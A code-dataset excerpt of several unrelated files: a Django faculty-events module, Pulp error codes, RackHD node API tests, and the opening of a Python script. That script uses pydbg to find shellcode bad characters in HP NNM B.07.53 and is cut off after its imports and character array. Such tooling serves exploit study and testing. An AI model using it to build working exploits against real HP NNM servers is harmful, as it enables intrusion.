return TeachingAdjust(fractions.Fraction(0), credits)
def get_credits_carried_forward(self):
return self.get_config('credits_forward')
def get_study_leave_credits(self):
return self.get_config('study_leave_credits')
class AccreditationFlagSearchRule(search.ChoiceSearchRule):
"""A hack to make viewer specific choice fields work."""
def make_value_field(self, viewer, member_units):
field = super(AccreditationFlagSearchRule, self).make_value_field(viewer, member_units)
from faculty.models import EventConfig
ecs = EventConfig.objects.filter(unit__in=member_units,
event_type=AccreditationFlagEventHandler.EVENT_TYPE)
field.choices += itertools.chain(*[ec.config.get('flags', []) for ec in ecs])
return field
class AccreditationFlagEventHandler(CareerEventHandlerBase):
"""
Aquisition of a accreditation-related property
"""
EVENT_TYPE = 'ACCRED'
NAME = 'Accreditation Attribute'
TO_HTML_TEMPLATE = """
{% extends "faculty/event_base.html" %}{% load event_display %}{% block dl %}
<dt>Attribute</dt><dd>{{ handler|get_display:"flag" }}</dd>
{% endblock %}
"""
class EntryForm(BaseEntryForm):
flag = forms.ChoiceField(required=True, choices=[], label='Attribute')
def post_init(self):
# set the allowed position choices from the config from allowed units
from faculty.models import EventConfig
ecs = EventConfig.objects.filter(unit__in=self.units,
event_type=AccreditationFlagEventHandler.EVENT_TYPE)
choices = itertools.chain(*[ec.config.get('flags', []) for ec in ecs])
self.fields['flag'].choices = choices
def clean(self):
from faculty.models import EventConfig
data = self.cleaned_data
if 'unit' not in data:
raise forms.ValidationError("Couldn't check unit for attribute ownership.")
found = False
try:
ec = EventConfig.objects.get(unit=data['unit'],
event_type=AccreditationFlagEventHandler.EVENT_TYPE)
flags = dict(ec.config.get('flags', []))
if data['flag'] in flags:
found = True
except EventConfig.DoesNotExist:
pass
if not found:
raise forms.ValidationError("That attribute is not owned by the selected unit.")
return data
SEARCH_RULES = {
'flag': AccreditationFlagSearchRule,
}
SEARCH_RESULT_FIELDS = [
'flag',
]
def get_flag_display(self):
"""
Get the name of this flag, for display to the user
"""
from faculty.models import EventConfig
try:
ec = EventConfig.objects.get(unit=self.event.unit, event_type=self.EVENT_TYPE)
fellowships = dict(ec.config.get('flags', {}))
except EventConfig.DoesNotExist:
fellowships = {}
flag = self.event.config.get('flag', '???')
return fellowships.get(flag, flag)
@classmethod
def default_title(cls):
return 'Accreditation Flag'
def short_summary(self):
return "Has {0}".format(self.get_flag_display())
class ContractReviewEventHandler(CareerEventHandlerBase):
EVENT_TYPE = 'CONTRACTRV'
NAME = "Contract Renewal"
IS_INSTANT = False
TO_HTML_TEMPLATE = '''
{% extends "faculty/event_base.html" %}
{% load event_display %}
{% block dl %}
<dt>Result</dt>
<dd>{{ handler|get_display:"result" }}</dd>
{% endblock %}'''
class EntryForm(BaseEntryForm):
result = forms.ChoiceField(label='Result', choices=CONTRACT_REVIEW_CHOICES)
SEARCH_RULES = {
'result': search.ComparableSearchRule,
}
SEARCH_RESULT_FIELDS = [
'result',
]
def get_result_display(self):
return CONTRACT_REVIEW_CHOICES.get(self.get_config('result'), 'unknown outcome')
def short_summary(self):
return "Contract Renewal: {0}".format(self.get_result_display(),)
| gpl-3.0 | -6,561,575,408,359,670,000 | 38.732456 | 155 | 0.601317 | false |
ulif/pulp | common/pulp/common/error_codes.py | 1 | 9417 | from collections import namedtuple
from gettext import gettext as _
Error = namedtuple('Error', ['code', 'message', 'required_fields'])
"""
The error named tuple has 4 components:
code: The 7 character uniquely identifying code for this error, 3 A-Z identifying the module
followed by 4 numeric characters for the msg id. All general pulp server errors start
with PLP
message: The message that will be printed for this error
required_files: A list of required fields for printing the message
"""
# The PLP0000 error is to wrap non-pulp exceptions
PLP0000 = Error("PLP0000",
"%(message)s", ['message'])
PLP0001 = Error("PLP0001",
_("A general pulp exception occurred"), [])
PLP0002 = Error(
"PLP0002",
_("Errors occurred updating bindings on consumers for repo %(repo_id)s and distributor "
"%(distributor_id)s"),
['repo_id', 'distributor_id'])
PLP0003 = Error("PLP0003",
_("Errors occurred removing bindings on consumers while deleting a distributor for "
"repo %(repo_id)s and distributor %(distributor_id)s"),
['repo_id', 'distributor_id'])
PLP0004 = Error("PLP0004",
_("Errors occurred creating bindings for the repository group %(group_id)s. "
"Binding creation was attempted for the repository %(repo_id)s and "
"distributor %(distributor_id)s"),
['repo_id', 'distributor_id', 'group_id'])
PLP0005 = Error("PLP0005",
_("Errors occurred deleting bindings for the repository group %(group_id)s. "
"Binding deletion was attempted for the repository %(repo_id)s and "
"distributor %(distributor_id)s"),
['repo_id', 'distributor_id', 'group_id'])
PLP0006 = Error("PLP0006", _("Errors occurred while updating the distributor configuration for "
"repository %(repo_id)s"),
['repo_id'])
PLP0007 = Error("PLP0007",
_("Error occurred while cascading delete of repository %(repo_id)s to distributor "
"bindings associated with it."),
['repo_id'])
PLP0008 = Error("PLP0008",
_("Error raising error %(code)s. "
"The field [%(field)s] was not included in the error_data."),
['code', 'field'])
PLP0009 = Error("PLP0009", _("Missing resource(s): %(resources)s"), ['resources'])
PLP0010 = Error("PLP0010", _("Conflicting operation reasons: %(reasons)s"), ['reasons'])
PLP0011 = Error("PLP0011", _("Operation timed out after: %(timeout)s"), ['timeout'])
PLP0012 = Error("PLP0012", _("Operation postponed"), [])
PLP0014 = Error("PLP0014", _('Operation not implemented: %(operation_name)s'), ['operation_name'])
PLP0015 = Error("PLP0015", _('Invalid properties: %(properties)s'), ['properties'])
PLP0016 = Error("PLP0016", _('Missing values for: %(properties)s'), ['properties'])
PLP0017 = Error("PLP0017", _('Unsupported properties: %(properties)s'), ['properties'])
PLP0018 = Error("PLP0018", _('Duplicate resource: %(resource_id)s'), ['resource_id'])
PLP0019 = Error("PLP0019", _('Pulp only accepts input encoded in UTF-8: %(value)s'), ['value'])
PLP0020 = Error("PLP0020",
_("Errors occurred installing content for the consumer group %(group_id)s."),
['group_id'])
PLP0021 = Error("PLP0021",
_("Errors occurred updating content for the consumer group %(group_id)s."),
['group_id'])
PLP0022 = Error("PLP0022",
_("Errors occurred uninstalling content for the consumer group %(group_id)s."),
['group_id'])
PLP0023 = Error("PLP0023", _("Task is already in a complete state: %(task_id)s"), ['task_id'])
PLP0024 = Error("PLP0024",
_("There are no Celery workers found in the system for reserved task work. "
"Please ensure that there is at least one Celery worker running, and that the "
"celerybeat service is also running."),
[])
PLP0025 = Error("PLP0025", _("Authentication failed."), [])
PLP0026 = Error(
"PLP0026", _("Permission denied: user %(user)s cannot perform %(operation)s."),
['user', 'operation'])
PLP0027 = Error(
"PLP0027", _("Authentication with username %(user)s failed: invalid SSL certificate."),
['user'])
PLP0028 = Error(
"PLP0028", _("Authentication with username %(user)s failed: invalid oauth credentials."),
['user'])
PLP0029 = Error(
"PLP0029",
_("Authentication with username %(user)s failed: preauthenticated remote user is missing."),
['user'])
PLP0030 = Error(
"PLP0030",
_("Authentication with username %(user)s failed: invalid username or password"), ['user'])
PLP0031 = Error("PLP0031", _("Content source %(id)s could not be found at %(url)s"), ['id', 'url'])
PLP0032 = Error(
"PLP0032", _("Task %(task_id)s encountered one or more failures during execution."),
['task_id'])
PLP0034 = Error("PLP0034", _("The distributor %(distributor_id)s indicated a failed response when "
"publishing repository %(repo_id)s."),
['distributor_id', 'repo_id'])
PLP0037 = Error(
"PLP0037",
_("Content import of %(path)s failed - must be an existing file."),
['path'])
PLP0038 = Error("PLP0038", _("The unit model with id %(model_id)s and class "
"%(model_class)s failed to register. Another model has already "
"been registered with the same id."), ['model_id', 'model_class'])
PLP0040 = Error("PLP0040", _("Database 'seeds' config must include at least one hostname:port "
"value. Refer to /etc/pulp/server.conf for proper use."), [])
PLP0041 = Error("PLP0041", _("Database 'replica_set' config must be specified when more than one "
"seed is provided. Refer to /etc/pulp/server.conf for proper use."),
[])
PLP0042 = Error("PLP0042", _("This request is forbidden."), [])
PLP0043 = Error("PLP0043", _("Database 'write_concern' config can only be 'majority' or 'all'. "
"Refer to /etc/pulp/server.conf for proper use."), [])
PLP0044 = Error("PLP0044", _("The target importer does not support the types from the source"), [])
PLP0045 = Error("PLP0045", _("The repository cannot be exported because some units are "
"not downloaded."), [])
PLP0046 = Error("PLP0046", _("The repository group cannot be exported because these repos have "
"units that are not downloaded: %(repos)s"), ['repos'])
PLP0047 = Error("PLP0047", _("The importer %(importer_id)s indicated a failed response when "
"uploading %(unit_type)s unit to repository %(repo_id)s."),
['importer_id', 'unit_type', 'repo_id'])
PLP0048 = Error("PLP0048", _("The file is expected to be present, but is not, for unit %(unit)s"),
['unit'])
PLP0049 = Error(
"PLP0049",
_('Worker terminated abnormally while processing task %(task_id)s. '
'Check the logs for details'),
['task_id'])
# Create a section for general validation errors (PLP1000 - PLP2999)
# Validation problems should be reported with a general PLP1000 error with a more specific
# error message nested inside of it.
PLP1000 = Error("PLP1000", _("A validation error occurred."), [])
PLP1001 = Error("PLP1001", _("The consumer %(consumer_id)s does not exist."), ['consumer_id'])
PLP1002 = Error("PLP1002", _("The field %(field)s must have a value specified."), ['field'])
PLP1003 = Error(
"PLP1003",
_("The value specified for the field %(field)s must be made up of letters, numbers, "
"underscores, or hyphens with no spaces."),
['field'])
PLP1004 = Error(
"PLP1004",
_("An object of type %(type)s already exists in the database with an id of %(object_id)s"),
['type', 'object_id'])
PLP1005 = Error("PLP1005", _("The checksum type '%(checksum_type)s' is unknown."),
['checksum_type'])
PLP1006 = Error(
"PLP1006", _("The value specified for the field %(field)s may not start with %(value)s."),
['field', 'value'])
PLP1007 = Error("PLP1007", _("The relative path specified must not point outside of the parent"
" directory: %(path)s"), ['path'])
PLP1008 = Error("PLP1008", _("The importer type %(importer_type_id)s does not exist"),
['importer_type_id'])
PLP1009 = Error("PLP1009", _("The request body does not contain valid JSON"), [])
PLP1010 = Error("PLP1010", _("Provided value %(value)s for field %(field)s must be of type "
"%(field_type)s."), ["value", "field", "field_type"])
PLP1011 = Error("PLP1011", _("Invalid task state passed to purge: %(state)s."), ["state"])
PLP1012 = Error("PLP1012", _("No task state given to parameters list for delete."), [])
PLP1013 = Error("PLP1013", _("Checksum does not match calculated value."), [])
PLP1014 = Error("PLP1014", _("The configuration value for the key '%(key)s' in "
"section '%(section)s' is not valid for the following "
"reason: %(reason)s"), ["key", "section", "reason"])
PLP1015 = Error("PLP1015", _("The JSON data must be of type '%(data_type)s'."),
['data_type'])
| gpl-2.0 | 3,952,500,558,581,350,000 | 56.072727 | 100 | 0.609642 | false |
stuart-stanley/RackHD | test/tests/api/v2_0/nodes_tests.py | 1 | 20157 | from config.api2_0_config import config
from config.amqp import *
from modules.logger import Log
from modules.amqp import AMQPWorker
from modules.worker import WorkerThread, WorkerTasks
from on_http_api2_0 import ApiApi as Api
from on_http_api2_0 import rest
from datetime import datetime
from proboscis.asserts import assert_equal
from proboscis.asserts import assert_false
from proboscis.asserts import assert_raises
from proboscis.asserts import assert_not_equal
from proboscis.asserts import assert_is_not_none
from proboscis.asserts import assert_true
from proboscis.asserts import fail
from proboscis import SkipTest
from proboscis import test
from json import loads
from time import sleep
LOG = Log(__name__)
@test(groups=['nodes_api2.tests'])
class NodesTests(object):
def __init__(self):
self.__client = config.api_client
self.__worker = None
self.__discovery_duration = None
self.__discovered = 0
self.__test_nodes = [
{
'identifiers': ["FF:FF:FF:01"],
'autoDiscover': False,
'name': 'test_switch_node',
'type': 'switch'
},
{
'identifiers': ["FF:FF:FF:02"],
'autoDiscover': False,
'name': 'test_mgmt_node',
'type': 'mgmt'
},
{
'identifiers': ["FF:FF:FF:03"],
'autoDiscover': False,
'name': 'test_pdu_node',
'type': 'pdu'
},
{
'identifiers': ["FF:FF:FF:04"],
'autoDiscover': False,
'name': 'test_enclosure_node',
'type': 'enclosure'
},
{
'identifiers': ["FF:FF:FF:05"],
'autoDiscover': False,
'name': 'test_compute_node',
'type': 'compute'
}
]
self.__test_tags = {
'tags': ['tag1', 'tag2']
}
self.__test_obm = {
'config': {
'host': '1.2.3.4',
'user': 'username',
'password': 'password'
},
'service': 'noop-obm-service'
}
def __get_data(self):
return loads(self.__client.last_response.data)
def __get_workflow_status(self, id, query ):
Api().nodes_get_workflow_by_id(identifier=id, active=query )
data = self.__get_data()
if len(data) > 0:
status = data[0].get('_status')
return status
return 'not running'
def __post_workflow(self, id, graph_name):
status = self.__get_workflow_status(id, 'true')
if status != 'pending' and status != 'running':
Api().nodes_post_workflow_by_id(identifier=id, name=graph_name, body={'name': graph_name})
timeout = 20
while status != 'pending' and status != 'running' and timeout != 0:
LOG.warning('Workflow status for Node {0} (status={1},timeout={2})'.format(id,status,timeout))
status = self.__get_workflow_status(id, 'true')
sleep(1)
timeout -= 1
return timeout
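    # Editor's note (hedged): __post_workflow returns the remaining timeout
    # budget, so callers treat 0 as "the graph never reached pending/running",
    # e.g.:
    #   if 0 == self.__post_workflow(node_id, 'Graph.Discovery'):
    #       fail('Timed out waiting for graph to start!')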
def check_compute_count(self):
Api().nodes_get_all()
nodes = self.__get_data()
count = 0
for n in nodes:
type = n.get('type')
if type == 'compute':
count += 1
return count
@test(groups=['nodes.api2.discovery.test'])
def test_nodes_discovery(self):
""" API 2.0 Testing Graph.Discovery completion """
count = defaults.get('RACKHD_NODE_COUNT', '')
if (count.isdigit() and self.check_compute_count() == int(count)) or self.check_compute_count():
LOG.warning('Nodes already discovered!')
return
self.__discovery_duration = datetime.now()
LOG.info('Wait start time: {0}'.format(self.__discovery_duration))
self.__task = WorkerThread(AMQPWorker(queue=QUEUE_GRAPH_FINISH, \
callbacks=[self.handle_graph_finish]), 'discovery')
def start(worker,id):
worker.start()
tasks = WorkerTasks(tasks=[self.__task], func=start)
tasks.run()
tasks.wait_for_completion(timeout_sec=1200)
assert_false(self.__task.timeout, \
message='timeout waiting for task {0}'.format(self.__task.id))
def handle_graph_finish(self,body,message):
routeId = message.delivery_info.get('routing_key').split('graph.finished.')[1]
Api().workflows_get()
workflows = self.__get_data()
for w in workflows:
injectableName = w.get('injectableName')
if injectableName == 'Graph.SKU.Discovery':
graphId = w.get('context',{}).get('graphId', {})
if graphId == routeId:
message.ack()
status = body.get('status')
if status == 'succeeded' or status == 'failed':
duration = datetime.now() - self.__discovery_duration
msg = {
'graph_name': injectableName,
'status': status,
'route_id': routeId,
'duration': str(duration)
}
if status == 'failed':
msg['active_task'] = w.get('tasks',{})
LOG.error(msg, json=True)
else:
LOG.info(msg, json=True)
self.__discovered += 1
break
check = self.check_compute_count()
if check and check == self.__discovered:
self.__task.worker.stop()
self.__task.running = False
self.__discovered = 0
@test(groups=['test-nodes-api2'], depends_on_groups=['nodes.api2.discovery.test'])
def test_nodes(self):
""" Testing GET:/api/2.0/nodes """
Api().nodes_get_all()
nodes = self.__get_data()
LOG.debug(nodes,json=True)
assert_not_equal(0, len(nodes), message='Node list was empty!')
@test(groups=['test-node-id-api2'], depends_on_groups=['test-nodes-api2'])
def test_node_id(self):
""" Testing GET:/api/2.0/nodes/:id """
Api().nodes_get_all()
nodes = self.__get_data()
LOG.debug(nodes,json=True)
codes = []
for n in nodes:
LOG.info(n,json=True)
if n.get('type') == 'compute':
uuid = n.get('id')
Api().nodes_get_by_id(identifier=uuid)
rsp = self.__client.last_response
codes.append(rsp)
assert_not_equal(0, len(codes), message='Failed to find compute node Ids')
for c in codes:
assert_equal(200, c.status, message=c.reason)
assert_raises(rest.ApiException, Api().nodes_get_by_id, 'fooey')
@test(groups=['create-node-api2'], depends_on_groups=['test-node-id-api2'])
def test_node_create(self):
""" Testing POST:/api/2.0/nodes/ """
for n in self.__test_nodes:
LOG.info('Creating node (name={0})'.format(n.get('name')))
Api().nodes_post(identifiers=n)
rsp = self.__client.last_response
assert_equal(201, rsp.status, message=rsp.reason)
@test(groups=['patch-node-api2'], depends_on_groups=['test-node-id-api2'])
def test_node_patch(self):
""" Testing PATCH:/api/2.0/nodes/:id """
data = {"name": 'fake_name_test'}
Api().nodes_get_all()
nodes = self.__get_data()
codes = []
for n in nodes:
if n.get('name') == 'test_compute_node':
uuid = n.get('id')
Api().nodes_patch_by_id(identifier=uuid,body=data)
rsp = self.__client.last_response
test_nodes = self.__get_data()
assert_equal(test_nodes.get('name'), 'fake_name_test', 'Oops patch failed')
codes.append(rsp)
LOG.info('Restoring name to "test_compute_node"')
correct_data = {"name": 'test_compute_node'}
Api().nodes_patch_by_id(identifier=uuid,body=correct_data)
rsp = self.__client.last_response
restored_nodes = self.__get_data()
assert_equal(restored_nodes.get('name'), 'test_compute_node', 'Oops restoring failed')
codes.append(rsp)
assert_not_equal(0, len(codes), message='Failed to find compute node Ids')
for c in codes:
assert_equal(200, c.status, message=c.reason)
assert_raises(rest.ApiException, Api().nodes_patch_by_id, 'fooey', data)
@test(groups=['delete-node-api2'], depends_on_groups=['patch-node-api2'])
def test_node_delete(self):
""" Testing DELETE:/api/2.0/nodes/:id """
codes = []
test_names = []
Api().nodes_get_all()
nodes = self.__get_data()
test_names = [t.get('name') for t in self.__test_nodes]
for n in nodes:
name = n.get('name')
if name in test_names:
uuid = n.get('id')
LOG.info('Deleting node {0} (name={1})'.format(uuid, name))
Api().nodes_del_by_id(identifier=uuid)
codes.append(self.__client.last_response)
assert_not_equal(0, len(codes), message='Delete node list empty!')
for c in codes:
assert_equal(204, c.status, message=c.reason)
assert_raises(rest.ApiException, Api().nodes_del_by_id, 'fooey')
@test(groups=['catalog_nodes-api2'], depends_on_groups=['delete-node-api2'])
def test_node_catalogs(self):
""" Testing GET:/api/2.0/nodes/:id/catalogs """
resps = []
Api().nodes_get_all()
nodes = self.__get_data()
for n in nodes:
if n.get('type') == 'compute':
Api().nodes_get_catalog_by_id(identifier=n.get('id'))
resps.append(self.__get_data())
for resp in resps:
assert_not_equal(0, len(resp), message='Node catalog is empty!')
assert_raises(rest.ApiException, Api().nodes_get_catalog_by_id, 'fooey')
@test(groups=['catalog_source-api2'], depends_on_groups=['catalog_nodes-api2'])
def test_node_catalogs_bysource(self):
""" Testing GET:/api/2.0/nodes/:id/catalogs/source """
resps = []
Api().nodes_get_all()
nodes = self.__get_data()
for n in nodes:
if n.get('type') == 'compute':
Api().nodes_get_catalog_source_by_id(identifier=n.get('id'), source='bmc')
resps.append(self.__client.last_response)
for resp in resps:
assert_equal(200,resp.status, message=resp.reason)
assert_raises(rest.ApiException, Api().nodes_get_catalog_source_by_id, 'fooey','bmc')
@test(groups=['node_workflows-api2'], depends_on_groups=['catalog_source-api2'])
def test_node_workflows_get(self):
""" Testing GET:/api/2.0/nodes/:id/workflows """
resps = []
Api().nodes_get_all()
nodes = self.__get_data()
for n in nodes:
if n.get('type') == 'compute':
Api().nodes_get_workflow_by_id(identifier=n.get('id'))
resps.append(self.__get_data())
# Api().nodes_get_workflow_by_id('fooey')
# try:
# Api().nodes_get_workflow_by_id('fooey')
# fail(message='did not raise exception for nodes_get_workflow_by_id with bad id')
# except rest.ApiException as e:
# assert_equal(404, e.status,
# message='unexpected response {0}, expected 404 for bad nodeId'.format(e.status))
# @test(groups=['node_post_workflows-api2'], depends_on_groups=['node_workflows-api2'])
# def test_node_workflows_post(self):
# """ Testing POST:/api/2.0/nodes/:id/workflows """
# resps = []
# Api().nodes_get_all()
# nodes = self.__get_data()
# for n in nodes:
# if n.get('type') == 'compute':
# id = n.get('id')
# timeout = self.__post_workflow(id,'Graph.Discovery')
# if timeout > 0:
# data = self.__get_data()
# resps.append({'data': data, 'id':id})
# for resp in resps:
# assert_not_equal(0, len(resp['data']),
# message='No Workflows found for Node {0}'.format(resp['id']))
# assert_raises(rest.ApiException, Api().nodes_post_workflow_by_id, 'fooey',name='Graph.Discovery',body={})
# @test(groups=['node_workflows_del_active-api2'], depends_on_groups=['node_post_workflows-api2'])
# def test_workflows_action(self):
# """ Testing PUT:/api/2.0/nodes/:id/workflows/action """
# Api().nodes_get_all()
# nodes = self.__get_data()
# for n in nodes:
# if n.get('type') == 'compute':
# id = n.get('id')
# timeout = 5
# done = False
# while timeout > 0 and done == False:
# if 0 == self.__post_workflow(id,'Graph.Discovery'):
# fail('Timed out waiting for graph to start!')
# try:
# Api().nodes_workflow_action_by_id(id, {'command': 'cancel'})
# done = True
# except rest.ApiException as e:
# if e.status != 404:
# raise e
# timeout -= 1
# assert_not_equal(timeout, 0, message='Failed to delete an active workflow')
# assert_raises(rest.ApiException, Api().nodes_workflow_action_by_id, 'fooey', {'command': 'test'})
@test(groups=['node_tags_patch'], depends_on_groups=['node_workflows-api2'])
def test_node_tags_patch(self):
""" Testing PATCH:/api/2.0/nodes/:id/tags """
codes = []
Api().nodes_get_all()
rsp = self.__client.last_response
nodes = loads(rsp.data)
codes.append(rsp)
for n in nodes:
LOG.info(n, json=True)
Api().nodes_patch_tag_by_id(identifier=n.get('id'), body=self.__test_tags)
LOG.info('Creating tag (name={0})'.format(self.__test_tags))
rsp = self.__client.last_response
codes.append(rsp)
LOG.info(n.get('id'))
for c in codes:
assert_equal(200, c.status, message=c.reason)
assert_raises(rest.ApiException, Api().nodes_patch_tag_by_id, 'fooey',body=self.__test_tags)
@test(groups=['node_tags_get'], depends_on_groups=['node_tags_patch'])
def test_node_tags_get(self):
""" Testing GET:api/2.0/nodes/:id/tags """
codes = []
Api().nodes_get_all()
rsp = self.__client.last_response
nodes = loads(rsp.data)
codes.append(rsp)
for n in nodes:
Api().nodes_get_tags_by_id(n.get('id'))
rsp = self.__client.last_response
tags = loads(rsp.data)
codes.append(rsp)
for t in self.__test_tags.get('tags'):
assert_true(t in tags, message= "cannot find new tag" )
for c in codes:
assert_equal(200, c.status, message=c.reason)
assert_raises(rest.ApiException, Api().nodes_patch_tag_by_id, 'fooey',body=self.__test_tags)
@test(groups=['node_tags_delete'], depends_on_groups=['node_tags_get'])
def test_node_tags_del(self):
""" Testing DELETE:api/2.0/nodes/:id/tags/:tagName """
get_codes = []
del_codes = []
Api().nodes_get_all()
rsp = self.__client.last_response
nodes = loads(rsp.data)
get_codes.append(rsp)
for n in nodes:
for t in self.__test_tags.get('tags'):
Api().nodes_del_tag_by_id(identifier=n.get('id'), tag_name=t)
rsp = self.__client.last_response
del_codes.append(rsp)
Api().nodes_get_by_id(identifier=n.get('id'))
rsp = self.__client.last_response
get_codes.append(rsp)
updated_node = loads(rsp.data)
for t in self.__test_tags.get('tags'):
assert_true(t not in updated_node.get('tags'), message= "Tag " + t + " was not deleted" )
for c in get_codes:
assert_equal(200, c.status, message=c.reason)
for c in del_codes:
assert_equal(204, c.status, message=c.reason)
assert_raises(rest.ApiException, Api().nodes_del_tag_by_id, 'fooey',tag_name=['tag'])
@test(groups=['nodes_tag_masterDelete'], depends_on_groups=['node_tags_delete'])
def test_node_tags_masterDel(self):
""" Testing DELETE:api/2.0/nodes/tags/:tagName """
codes = []
self.test_node_tags_patch()
t = 'tag3'
LOG.info("Check to make sure invalid tag is not deleted")
Api().nodes_master_del_tag_by_id(tag_name=t)
rsp = self.__client.last_response
codes.append(rsp)
LOG.info("Test to check valid tags are deleted")
for t in self.__test_tags.get('tags'):
Api().nodes_master_del_tag_by_id(tag_name=t)
rsp = self.__client.last_response
codes.append(rsp)
for c in codes:
assert_equal(204, c.status, message=c.reason)
@test(groups=['node_put_obm_by_node_id'], depends_on_groups=['nodes_tag_masterDelete'])
def test_node_put_obm_by_node_id(self):
"""Testing PUT:/api/2.0/nodes/:id/obm"""
Api().nodes_get_all()
rsp = self.__client.last_response
nodes = loads(rsp.data)
assert_equal(200, rsp.status, message=rsp.status)
for n in nodes:
LOG.info(n, json=True)
Api().nodes_put_obms_by_node_id(identifier=n.get('id'), body=self.__test_obm)
LOG.info('Creating obm {0}'.format(self.__test_obm))
rsp = self.__client.last_response
LOG.info(n.get('id'))
assert_equal(201, rsp.status, message=rsp.status)
@test(groups=['node_get_obm_by_node_id'], depends_on_groups=['node_put_obm_by_node_id'])
def test_node_get_obm_by_node_id(self):
"""Testing GET:/api/2.0/:id/obm"""
Api().nodes_get_all()
rsp = self.__client.last_response
nodes = loads(rsp.data)
assert_equal(200, rsp.status, message=rsp.status)
for n in nodes:
LOG.info(n, json=True)
Api().nodes_get_obms_by_node_id(identifier=n.get('id'))
LOG.info('getting OBMs for node {0}'.format(n.get('id')))
rsp = self.__client.last_response
assert_equal(200, rsp.status, message=rsp.status)
obms = loads(rsp.data)
assert_not_equal(0, len(obms), message='OBMs list was empty!')
for obm in obms:
id = obm.get('id')
Api().obms_delete_by_id(identifier=id)
rsp = self.__client.last_response
assert_equal(204, rsp.status, message=rsp.status)
@test(groups=['node_put_obm_invalid'], depends_on_groups=['node_get_obm_by_node_id'])
def test_node_put_obm_invalid_node_id(self):
"""Test that PUT:/api/2.0/:id/obm returns 404 with invalid node ID"""
try:
Api().nodes_put_obms_by_node_id(identifier='invalid_ID', body=self.__test_obm)
fail(message='did not raise exception')
except rest.ApiException as e:
assert_equal(404, e.status, message='unexpected response {0}, expected 404'.format(e.status))
@test(groups=['node_get_obm_invalid'], depends_on_groups=['node_put_obm_invalid'])
def test_node_get_obm_invalid_node_id(self):
"""Test that PUT:/api/2.0/:id/obm returns 404 with invalid node ID"""
try:
Api().nodes_get_obms_by_node_id(identifier='invalid_ID')
fail(message='did not raise exception')
except rest.ApiException as e:
assert_equal(404, e.status, message='unexpected response {0}, expected 404'.format(e.status))
| apache-2.0 | -2,104,577,647,102,050,300 | 41.978678 | 114 | 0.540904 | false |
QuincyWork/AllCodes | Python/Codes/Practice/LeetCode/211 Add and Search Word - Data structure design.py | 1 | 1913 |
# define const variable
_MAX_LETTER_SIZE = 27  # 26 letters plus the end-of-word tag (currently unused)
_STRING_END_TAG = '#'
class TrieNode(object):
    def __init__(self, x):
        self.value = x
        self.childNodes = {}
class WordDictionary(object):
def __init__(self):
"""
Initialize your data structure here.
"""
        self.root = TrieNode(0)
def addWord(self, word):
"""
Adds a word into the data structure.
:type word: str
:rtype: void
"""
word = word + _STRING_END_TAG
currentNode = self.root
childNode = None
for value in word:
childNode = currentNode.childNodes.get(value)
if not childNode:
                childNode = TrieNode(value)
currentNode.childNodes[value] = childNode
currentNode = childNode
def __searchChild(self,node,value):
currentNode = node
if not value:
return True
result = False
if value[0] == '.':
for key,child in currentNode.childNodes.items():
if self.__searchChild(child,value[1:]):
result = True
break
else:
child = currentNode.childNodes.get(value[0])
if child:
result = self.__searchChild(child,value[1:])
return result
def search(self, word):
"""
Returns if the word is in the data structure. A word could contain the dot character '.' to represent any one letter.
:type word: str
:rtype: bool
"""
word = word + _STRING_END_TAG
return self.__searchChild(self.root, word)
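# Complexity note (added): addWord costs O(L) for a word of length L, while
# search may branch into every child at each '.', so its worst case grows
# exponentially with the number of wildcards in the pattern.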
if __name__ == '__main__':
d = WordDictionary()
d.addWord("bad")
d.addWord("dad")
d.addWord("mad")
print(d.search("bad"))
print(d.search("pad"))
print(d.search(".ad"))
print(d.search("b.."))
| mit | -8,859,075,159,283,428,000 | 23.189873 | 125 | 0.521193 | false |
thorwhalen/ut | stats/util.py | 1 | 2022 | __author__ = 'thor'
from numpy import zeros, argmin, array, unique, where
from scipy.spatial.distance import cdist
def _df_picker(df, x_cols, y_col):
    # .as_matrix() was removed in pandas 1.0; .values works on old and new versions
    return df[x_cols].values, df[[y_col]].values
def df_picker_data_prep(x_cols, y_col):
return lambda df: _df_picker(df, x_cols, y_col)
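# Illustrative usage (assumes a pandas DataFrame `df` with these columns):
#     picker = df_picker_data_prep(['height', 'weight'], 'label')
#     X, y = picker(df)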
def binomial_probs_to_multinomial_probs(binomial_probs):
multinomial_probs = zeros((len(binomial_probs), 2))
multinomial_probs[:, 1] = binomial_probs
multinomial_probs[:, 0] = 1 - multinomial_probs[:, 1]
return multinomial_probs
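# e.g. binomial_probs_to_multinomial_probs([0.2, 0.7]) returns
# [[0.8, 0.2], [0.3, 0.7]]: column 1 holds p, column 0 holds 1 - p.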
def multinomial_probs_to_binomial_probs(multinomial_probs):
return multinomial_probs[:, 1]
def normalize_to_one(arr):
arr = array(arr)
return arr / float(sum(arr))
def point_idx_closest_to_centroid(X, centroid=None):
"""
X is a n x m ndarray of n points in m dimensions.
point_closest_to_centroid(X, centroid) returns the index of the point of X (a row of X) that is closest to the given
centroid point. If centroid is not given, the actual centroid, X.mean(axis=1), is taken.
"""
if centroid is None:
centroid = X.mean(axis=0)
return argmin(cdist(X, [centroid])[:, 0])
def point_closest_to_centroid(X, centroid=None):
"""
X is a n x m ndarray of n points in m dimensions.
point_closest_to_centroid(X, centroid) returns the point of X (a row of X) that is closest to the given
    centroid point. If centroid is not given, the actual centroid, X.mean(axis=0), is taken.
"""
if centroid is None:
centroid = X.mean(axis=0)
return X[argmin(cdist(X, [centroid])[:, 0])]
def get_cluster_representatives_indices(X, clus_labels, clus_centers):
representative_indices = list()
for label in unique(clus_labels):
cluster_point_indices = where(clus_labels == label)[0]
min_idx = argmin(cdist(X[cluster_point_indices, :], [clus_centers[label, :]])[:, 0])
representative_indices.append(cluster_point_indices[min_idx])
return array(representative_indices)
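if __name__ == '__main__':
    # Minimal smoke test (added; the points are made up for illustration).
    X = array([[0.0, 0.0], [2.0, 2.0], [0.9, 1.1]])
    print(point_closest_to_centroid(X))  # row nearest the centroid: [0.9, 1.1]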
| mit | 2,205,652,758,375,168,500 | 32.7 | 120 | 0.674085 | false |
greyshell/linuxJuicer | badchar-detection-automated/badchar-detection-HPNNM-B.07.53.py | 1 | 8764 | #!/usr/bin/env python
# Description: Identify good and bad chars in HPNNM-B.07.53
# author: greyshell
# Script requirements: python 2.7 x86, pydbg 32bit binary, python wmi, pywin32
# Copy pydbg inside C:\Python27\Lib\site-packages\
# Copy pydasm.pyd inside C:\Python27\Lib\site-packages\pydbg\
import os
import socket
import subprocess
import sys
import threading
import time
import wmi
from pydbg import *
from pydbg.defines import *
# Global variables
allchars = (
"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13"
